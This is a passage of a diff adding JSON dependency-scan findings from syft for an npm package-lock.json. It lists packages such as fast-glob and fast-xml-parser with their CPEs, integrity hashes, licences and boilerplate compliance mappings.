"syft-generated" + }, + { + "cpe": "cpe:2.3:a:fast_deep:fast-deep-equal:2.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:fast_deep:fast_deep_equal:2.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:fast:fast-deep-equal:2.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:fast:fast_deep_equal:2.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/fast-deep-equal@2.0.1", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/fast-deep-equal/-/fast-deep-equal-2.0.1.tgz", + "integrity": "sha512-bCK/2Z4zLidyB4ReuIsvALH6w31YfAQDmXMqMx6FyfHqvBxtjC0eRumeSu4Bs3XtXwpyIywtSTrVT99BxY1f9w==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "df8671df2c12ad48", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: fast-deep-equal 3.1.3", + "title": "fast-deep-equal 3.1.3", + "description": "Package discovered: fast-deep-equal 3.1.3", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "5dcd27213b9411fd", + "name": "fast-deep-equal", + "version": "3.1.3", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:fast-deep-equal:fast-deep-equal:3.1.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:fast-deep-equal:fast_deep_equal:3.1.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:fast_deep_equal:fast-deep-equal:3.1.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:fast_deep_equal:fast_deep_equal:3.1.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:fast-deep:fast-deep-equal:3.1.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:fast-deep:fast_deep_equal:3.1.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:fast_deep:fast-deep-equal:3.1.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:fast_deep:fast_deep_equal:3.1.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:fast:fast-deep-equal:3.1.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:fast:fast_deep_equal:3.1.3:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/fast-deep-equal@3.1.3", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/fast-deep-equal/-/fast-deep-equal-3.1.3.tgz", + "integrity": "sha512-f3qQ9oQy9j2AhBe/H9VC91wLmKBCCU/gDOnKNAYG5hswO7BLKj09Hc5HYNz9cGI++xlpDCIgDaitVs03ATR84Q==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "f137c47d21c65abc", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: fast-equals 5.4.0", + "title": "fast-equals 5.4.0", + "description": "Package discovered: fast-equals 5.4.0", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "fea7469744f21377", + "name": "fast-equals", + "version": "5.4.0", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:fast-equals:fast-equals:5.4.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:fast-equals:fast_equals:5.4.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:fast_equals:fast-equals:5.4.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:fast_equals:fast_equals:5.4.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:fast:fast-equals:5.4.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:fast:fast_equals:5.4.0:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/fast-equals@5.4.0", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/fast-equals/-/fast-equals-5.4.0.tgz", + "integrity": "sha512-jt2DW/aNFNwke7AUd+Z+e6pz39KO5rzdbbFCg2sGafS4mk13MI7Z8O5z9cADNn5lhGODIgLwug6TZO2ctf7kcw==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "c3d9f6c04405728e", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: fast-glob 3.3.3", + "title": "fast-glob 3.3.3", + "description": "Package discovered: fast-glob 3.3.3", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "756085ffd4026f3c", + "name": "fast-glob", + "version": "3.3.3", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:fast-glob:fast-glob:3.3.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:fast-glob:fast_glob:3.3.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:fast_glob:fast-glob:3.3.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:fast_glob:fast_glob:3.3.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:fast:fast-glob:3.3.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:fast:fast_glob:3.3.3:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/fast-glob@3.3.3", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/fast-glob/-/fast-glob-3.3.3.tgz", + "integrity": "sha512-7MptL8U0cqcFdzIzwOTHoilX9x5BrNqye7Z/LuC7kCMRio1EMSyqRK3BEAUD7sXRq4iT4AzTVuZdhgQ2TCvYLg==", + "dependencies": { + "@nodelib/fs.stat": "^2.0.2", + "@nodelib/fs.walk": "^1.2.3", + "glob-parent": "^5.1.2", + "merge2": "^1.3.0", + "micromatch": "^4.0.8" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "c31f574684b9f10b", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: fast-xml-builder 1.1.5", + "title": "fast-xml-builder 1.1.5", + "description": "Package discovered: fast-xml-builder 1.1.5", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "b198a6d2f9894f68", + "name": "fast-xml-builder", + "version": "1.1.5", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:fast-xml-builder:fast-xml-builder:1.1.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:fast-xml-builder:fast_xml_builder:1.1.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:fast_xml_builder:fast-xml-builder:1.1.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:fast_xml_builder:fast_xml_builder:1.1.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:fast-xml:fast-xml-builder:1.1.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:fast-xml:fast_xml_builder:1.1.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:fast_xml:fast-xml-builder:1.1.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:fast_xml:fast_xml_builder:1.1.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:fast:fast-xml-builder:1.1.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:fast:fast_xml_builder:1.1.5:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/fast-xml-builder@1.1.5", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/fast-xml-builder/-/fast-xml-builder-1.1.5.tgz", + "integrity": "sha512-4TJn/8FKLeslLAH3dnohXqE3QSoxkhvaMzepOIZytwJXZO69Bfz0HBdDHzOTOon6G59Zrk6VQ2bEiv1t61rfkA==", + "dependencies": { + "path-expression-matcher": "^1.1.3" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "b4dd20a63e4dfb25", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: fast-xml-parser 5.7.2", + "title": "fast-xml-parser 5.7.2", + "description": "Package discovered: fast-xml-parser 5.7.2", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "03ef00f42507be2f", + "name": "fast-xml-parser", + "version": "5.7.2", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:naturalintelligence:fast-xml-parser:5.7.2:*:*:*:*:*:*:*", + "source": "nvd-cpe-dictionary" + } + ], + "purl": "pkg:npm/fast-xml-parser@5.7.2", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/fast-xml-parser/-/fast-xml-parser-5.7.2.tgz", + "integrity": "sha512-P7oW7tLbYnhOLQk/Gv7cZgzgMPP/XN03K02/Jy6Y/NHzyIAIpxuZIM/YqAkfiXFPxA2CTm7NtCijK9EDu09u2w==", + "dependencies": { + "@nodable/entities": "^2.1.0", + "fast-xml-builder": "^1.1.5", + "path-expression-matcher": "^1.5.0", + "strnum": "^2.2.3" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "0cdc7a6cc314eb50", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: fastq 1.20.1", + "title": "fastq 1.20.1", + "description": "Package discovered: fastq 1.20.1", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "32597e8bd5ad1e0f", + "name": "fastq", + "version": "1.20.1", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "ISC", + "spdxExpression": "ISC", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:fastq:fastq:1.20.1:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/fastq@1.20.1", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/fastq/-/fastq-1.20.1.tgz", + "integrity": "sha512-GGToxJ/w1x32s/D2EKND7kTil4n8OVk/9mycTc4VDza13lOvpUZTGX3mFSCtV9ksdGBVzvsyAVLM6mHFThxXxw==", + "dependencies": { + "reusify": "^1.0.4" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "98eadb7c6959fda9", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: faye-websocket 0.11.4", + "title": "faye-websocket 0.11.4", + "description": "Package discovered: faye-websocket 0.11.4", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "5a9d4671ef023c43", + "name": "faye-websocket", + "version": "0.11.4", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "Apache-2.0", + "spdxExpression": "Apache-2.0", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:faye-websocket:faye-websocket:0.11.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:faye-websocket:faye_websocket:0.11.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:faye_websocket:faye-websocket:0.11.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:faye_websocket:faye_websocket:0.11.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:faye:faye-websocket:0.11.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:faye:faye_websocket:0.11.4:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/faye-websocket@0.11.4", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/faye-websocket/-/faye-websocket-0.11.4.tgz", + "integrity": "sha512-CzbClwlXAuiRQAlUyfqPgvPoNKTckTPGfwZV4ZdAhVcP2lh9KUxJg2b5GkE7XbjKQ3YJnQ9z6D9ntLAlB+tP8g==", + "dependencies": { + "websocket-driver": ">=0.5.1" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "64d0cebc4ed83cee", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: fdir 6.5.0", + "title": "fdir 6.5.0", + "description": "Package discovered: fdir 6.5.0", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": 